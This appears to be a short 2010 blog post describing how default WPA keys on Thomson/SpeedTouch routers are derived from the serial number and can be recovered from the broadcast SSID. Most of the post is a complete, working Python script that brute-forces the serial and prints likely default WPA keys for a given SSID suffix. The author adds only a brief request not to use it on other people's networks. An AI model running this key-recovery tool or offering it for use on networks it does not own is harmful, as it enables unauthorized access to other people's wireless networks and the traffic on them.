Thomson/SpeedTouch routers and WPA keys

Posted on 5 Jan 2010.

In case you didn't know, the default WPA key in Thomson/SpeedTouch routers is generated from the router's serial. By some strange coincidence, so is the router's SSID, which means that if you know the SSID (which is public knowledge), you can brute-force the serial.

There are programs to do this already, but they were not future-proof or open enough to work now, so I wrote a small Python script to do it. Just enter the last part of the router's SSID (e.g. 99AF3C in Thomson-99AF3C) and the script will find the likely WPA keys.

You can use this script to verify that your router is vulnerable and change the encryption key, but please don't use it to break into other people's networks! That's rude.

EDIT: I updated the algorithm, it now features 200% more correctness and 400% more slowness :/ Sadly, it's many times slower than similar tools, but maybe it will be useful to you somehow. Speedup tips appreciated!

Here it is:


#!/usr/bin/env python

import sys
import hashlib
from binascii import hexlify as hexl
from itertools import product as prod

try:
    import psyco
    psyco.full()
except:
    pass

if len(sys.argv) != 2:
    print "speedtouchkey.py <SSID>"
    sys.exit(1)

chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ssid = sys.argv[1].lower().strip()

try:
    int(ssid, 16)
except ValueError:
    print "%s is not a valid SSID." % ssid
    sys.exit(1)

for year in range(8,11):
    print "Searching year %02d..." % year
    for week in range(1, 53):
        for xxx in prod(chars, chars, chars):
            xx = "".join(xxx)
            serial = "CP%02d%02d%s" % (year, week, hexl(xx).upper())
            sha = hashlib.sha1(serial).hexdigest()
            if sha.endswith(ssid):
                print "  Likely key: %s (serial %s)." % (sha[:10], "CP%02d%02d??%s" % (year, week, xx))